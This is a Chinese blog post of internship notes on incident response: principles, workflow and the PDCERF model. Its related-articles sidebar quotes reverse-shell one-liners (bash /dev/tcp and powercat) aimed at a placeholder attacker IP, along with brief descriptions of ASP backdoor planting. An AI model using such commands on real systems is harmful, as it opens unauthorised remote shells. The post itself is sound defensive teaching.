信息安全毕业实训实习-Day11

于 2024-09-11 22:34:57 发布
阅读量587 收藏 15
点赞数 7
文章标签: 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67446464/article/details/142150409
版权

1. 应急响应原则

1.1 3W1H原则

3W即Who、What、Why、1H即How,做应急响应要带着疑问来做事,一定要收集清楚这些信息。网络拓扑是怎么样的?需求是啥?发生了什么事?你能做什么?用户用了什么产品?产品版本多少?病毒库版本多少?多少主机中了?主机是普通pc还是服务器?服务器是做什么的?......信息收集越多,对应急响应越有利。

1.2 易失性原则

做应急响应免不了要做信息收集和取证的,但这里是有一定的先后顺序的,即最容易丢失的证据,应该最先收集,其它的依次类推。

1.3 要素原则

做应急响应,主要是抓关键证据,即要素,这些要素包括样本,流量,日志,进程及模块,内存,启动项。

1.4 避害原则

做应急响应,要做到趋利避害,不能问题还没有解决,反而引入了新的问题。譬如,自己使用的工具被感染而不知情:给用户使用不恰当的工具或软件造成客户主机出现问题;给别人发样本,不加密,不压缩,导致别人误点中毒,最极端的场景就是给别人发勒索样本不加密压缩,导致别人误点中毒。

2. 应急响应流程(预案,研判,遏止,取证,溯源,恢复——无先后顺序,根据实际情况进行处理)

2.1 预案(预防为主)

  • 预防风险:搜集威胁情报,定期漏洞扫描,内部安全宣讲等。
  • 制定应急预案:针对不同风险场景,制定详细的应急响应预案,包括行动计划、团队职责、资源调配等。
  • 培训演练:定期对预案进行培训和演练,提高应急响应团队的协同作战能力和应变能力。

应急响应常用命令(Linux):

应急响应-主机安全之系统及进程排查相关命令

应急响应-主机安全之文件相关命令(Linux操作系统)

应急响应-主机安全之网络相关命令

2.2 研判

  • 事件接收:及时接收来自监控系统、用户反馈或其他渠道的安全事件报告。
  • 研判分析:对事件进行研判分析,判断是否为真实攻击事件,判断事件类型、影响范围、严重程度等。主要从主机、网络、文件三个方面来判断。
  • 信息收集:收集与事件相关的信息,包括攻击者IP、攻击手法、受损情况等。

2.3 遏止

  • 紧急隔离:对受影响的系统或设备进行紧急隔离,防止攻击扩散。
  • 及时止损:封禁ip,踢出账号,网络隔离,重装操作系统等
  • 清除恶意代码:使用杀毒软件、安全工具等手段清除系统中的恶意代码。

2.4 取证

  • 证据收集:收集与事件相关的所有证据,包括日志、流量、样本等。
  • 证据分析:对收集到的证据进行深入分析,在测试环境复现攻击,还原攻击过程,确定攻击者身份和攻击目的。
  • 取证报告:将分析结果整理成报告,为后续处置提供依据。

2.5 溯源

  • 追踪攻击路径:根据分析结果,追踪攻击者完整的攻击路径和攻击点。
  • 收集攻击者信息:收集攻击者的IP地址、域名、邮箱等信息,为追踪攻击者提供线索。
  • 协同处理:与相关部门和机构合作,共同追踪和打击攻击者。

2.6 恢复

  • 清理修复:清理攻击痕迹,例如恶意进程、恶意文件等;对系统中存在的漏洞进行修复,防止再次被攻击。
  • 恢复服务:在确保系统安全的前提下,逐步恢复受影响的服务。
  • 数据恢复:对受损的数据进行恢复,确保业务连续性。

3. 总结应急响应措施及相关操作

应急响应PDCERF模型:

3.1 准备阶段

准备阶段需要及时确认安全事件背景、相关负责人联系方式、确定参与此次应急响应人员、根据情况,初步判定事件响应策略。

准备阶段主要包括:事件背景、响应人员确定、事件响应策略、相关负责人联系方式、应急响应相关授权、应急响应工具包、应急响应手册等。

3.2 检测阶段

检测阶段确认入侵事件是否发生,如真发生了入侵事件,评估造成的危害、范围以及发展的速度,事件会不会进一步升级。然后根据评估结果通知相关的人员进入应急的流程。

检测阶段主要包括:事件类型、事件影响范围、受影响系统、事件发展趋势、安全设备等。

事件类型分类

安全事件分类主要参考中央网信办发布《国家网络安全事件应急预案》,网络安全事件分为有害程序事件、网络攻击事件、信息破坏事件、信息内容安全事件、设备设施故障、灾害性事件和其他网络安全事件等。

  1. 有害程序事件分为计算机病毒事件、蠕虫事件、特洛伊木马事件、僵尸网络事件、混合程序攻击事件、网页内嵌恶意代码事件和其他有害程序事件。
  2. 网络攻击事件分为拒绝服务攻击事件、后门攻击事件、漏洞攻击事件、网络扫描窃听事件、网络钓鱼事件、干扰事件和其他网络攻击事件。
  3. 信息破坏事件分为信息篡改事件、信息假冒事件、信息泄露事件、信息窃取事件、信息丢失事件和其他信息破坏事件。
  4. 信息内容安全事件是指通过网络传播法律法规禁止信息,组织非法串联、煽动集会游行或炒作敏感问题并危害国家安全、社会稳定和公众利益的事件。
  5. 设备设施故障分为软硬件自身故障、外围保障设施故障、人为破坏事故和其他设备设施障。
  6. 灾害性事件是指由自然灾害等其他突发事件导致的网络安全事件。
  7. 其他事件是指不能归为以上分类的网络安全事件  

3.3 抑制阶段

采用针对性的安全措施降低事件损失、避免安全事件的扩散和安全事件对受害系统的持续性破坏。主要分为:物理遏制、网络遏制、主机遏制、应用遏制等。

常见手段:断网、降权、网络封堵等。

3.4 根除阶段

本阶段主要任务是通过事件分析查明事件危害的方式,并且给出清除危害的解决方案。可以从以下几个方面入手:系统基本信息、网络排查、进程排查、注册表排查、计划任务排查、服务排查、关键目录排查、用户组排查、事件日志排查、webshell排查、中间件日志排查、安全设备日志排查等。

3.5 恢复阶段

恢复系统的运行过程,把受影响系统、设备、软件和应用服务还原到正常的工作状态;系统恢复、网络恢复、用户恢复、数据恢复以及重新部署。

常见手段:系统重装、补丁加固、网络恢复、密码重置、木马清除等。

3.6 跟踪阶段

在业务系统恢复后,需要整理一份详细的事件总结报告,包括事件发生及各部门介入处理的时间线,事件可能造成的损失和提供安全加固优化建议。

跟踪阶段主要包括:调查事件原因,输出应急响应报告,提供安全建议、加强安全教育、避免同类事件再次发生。

超超已经
关注
  • 7
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试面试题--日更(1-9day)
IerkeU的博客
02-28 7947
day-one 1、拿到一个待检测的web站,渗透测试思路? 答: (1)信息收集 获取域名的whois信息,获取注册者的邮箱姓名电话等 查服务器的旁站以及子域名站点,因为主站一般比较难,所以可以先看看旁站有没有通用cms或者其他漏洞 查看服务器操作系统版本,web中间件,看看是否存在已知漏洞 查看IP,进行IP地址的全面扫描,对响应端口进行漏洞探测 (2)漏洞扫描:开始检测漏洞,例如XSS,XSRF,SQL注入,命令执行,越权访问,暴力破解… (3)漏洞利用:利益扫描到的漏洞拿到webshell或者其
计算机专业实习实训内容和要求,大学生计算机实习目的和要求.doc
weixin_39578457的博客
06-21 2442
大学生计算机实习目的和要求大学生计算机实习目的和要求1、学生在学习了专业课程之后,通过专业实习,在了解企业概况的基础上,对与计算机应用密切相关的某一方面的管理业务活动进行详细调查和系统分析,建立业务管理信息系统的整体概念,学会运用专业知识去发现问题和解决问题的方法,增强业务实践能力。2、通过实习,参加一定的业务活动和管理实践,了解企业的管理现状、所具备的基础及存在的问题,了解国情,增强学好专业的信...
信息安全毕业实训实习-Day7
m0_67446464的博客
09-05 716
文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)_upload靶场题型-CSDN博客。
信息安全毕业实训实习-Day9
m0_67446464的博客
09-05 1154
Cobalt Strike是一种针对网络攻击和渗透测试的工具套件,最初是由Raphael Mudge开发的。它被广泛使用于红队行动、渗透测试和攻击模拟等领域。拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受技术大佬的喜爱。Cobalt Strike提供了一系列功能,包括社交工程、恶意软件传播、漏洞利用、远程控制、数据搜集和横向渗透等。
信息安全毕业实训实习-Day4
m0_67446464的博客
08-30 1003
反射型跨站脚本漏洞,最普遍的类型。用户访问服务器-跨站链接-返回跨站代码。这种攻击往往具有一次性。攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户,当用户点击时,服务器接受该用户的请求并进行处理,然后把带有XSS的代码发送给用户。用户浏览器解析执行代码,触发XSS漏洞。反射型XSS攻击原理。
信息安全毕业实训实习-Day3
m0_67446464的博客
08-29 672
xray 为单文件二进制文件,无依赖,也无需安装,下载后直接使用xray 跨平台支持,请下载时选择需要的版本下载。注意: 不要直接 clone 仓库,xray 并不开源,仓库内不含源代码,直接下载构建的二进制文件即可。
Day06实习日记1
08-08
今天的实习内容主要集中在JSP的学习上,这是一个对于网页动态生成至关重要的技术。 上午的课程首先预留了半小时用于回顾昨天所讲的内容,这是对知识巩固的一个重要环节,通过复习,我们可以更好地理解和吸收新知识...
Day02实习日记1
08-08
在实践中,学员们通过创建ArrayList实例来存储班级学生的信息,体验了如何添加、删除和查询元素。 接着,学员们接触到了双列集合类,如Map,它用于存储键值对,每个键都是唯一的。在双列集合中,Iterate集合的正向...
(完整word版)软件开发实习日记.doc
11-15
软件开发实习日记 这篇实习日记记录了一个实习生的软件开发经验,从面试到实际项目的开发,涵盖了C#、XML、反射、抽象工厂模式、设计模式等多个知识点。 DAY 1: * 了解了C#基础知识,包括界面、数据压入堆栈、...
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1736
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 807
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 609
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 985
本文主要介绍网络安全认识与学习规划
内网安全:反弹shell
8888的博客
09-10 892
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
WEB攻防-ASP安全&MDB下载植入&IIS短文件名&写权限&解析
2301_78384345的博客
09-08 461
可以通过扫描得到数据库文件路径,或者如果有网站源码,可以根据默认配置(目标服务器没有该配置的情况下)扫描到之后,用下面的工具(不支持win10)把木马文件put到服务器,上传后修改文件名为可解析文件。通过留言写入后门,在通过菜刀访问.asp时,就会执行后门。ASP-中间件-IIS短文件名探针-安全漏洞。ASP-中间件-IIS文件上传解析-安全漏洞。ASP-中间件-IIS配置目录读写-安全配置。ASP-数据库-ASP后门植入连接。2、ASP-数据库下载&植入;ASP-数据库-MDB默认下载。
【AI大模型应用开发】1.3 Prompt攻防(安全) 和 Prompt逆向工程
2401_86518761的博客
09-06 1067
本文主要介绍了Prompt攻击和防攻击的手段,这对于大模型应用开发非常重要,毕竟谁也不想自己辛辛苦苦做的东西被拿来干坏事或者隐私遭到泄漏,这对一个应用来说是致命性的。然后稍微介绍了下Prompt逆向工程,这其实就是用来学习优秀Prompt的一种手段。
端口安全老化细节
qq_25467441的博客
09-06 892
绝对老化会在设定时间后强制性地老化掉MAC地址,而相对老化则会在接收到新数据包时重置老化时间。MAC地址表老化时间累计到30秒了,因为是30秒的时候学到的,到一分钟的时候正好学了30秒。举例来说,如果在1:30学习到MAC地址,但在1:30又接收到来自同一MAC地址的数据包,老化时间会重置为0,从这一时刻重新开始计时。举例来说,现在的时间是0:00:00,0:00:30秒的时候学到了一个安全MAC地址表。相对老化模式下,老化时间也是设定的,但是在接口学习到新的数据包时,老化计时会重置。
稀土阻燃剂:电子设备的安全守护者
最新发布
Kingcela1的博客
09-11 416
稀土阻燃剂在电子设备中的应用主要是通过提升材料的阻燃性能、热稳定性和环保安全性,来满足现代电子产品对高性能和安全性的需求。随着技术的不断进步,稀土阻燃剂在电子设备领域的应用前景将会更加广阔。
day--和--day区别
04-18
"day--"和"day"是两种不同的操作符,它们在编程中有着不同的含义和用法。 1. "day--"是一个后缀自减操作符,用于将变量的值减1,并返回减1之前的值。例如,如果有一个变量day的值为5,执行day--操作后,day的值将变为4,并且表达式的结果为5。这个操作符通常用于循环或迭代中,用于递减计数器或索引。 2. "day"是一个变量名或标识符,用于表示一个存储数据的位置。它可以是任何合法的变量名,用于存储某个特定类型的数据。例如,可以定义一个变量day来表示一周中的某一天。 总结起来,"day--"是一个操作符,用于递减变量的值;而"day"是一个变量名,用于表示存储数据的位置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值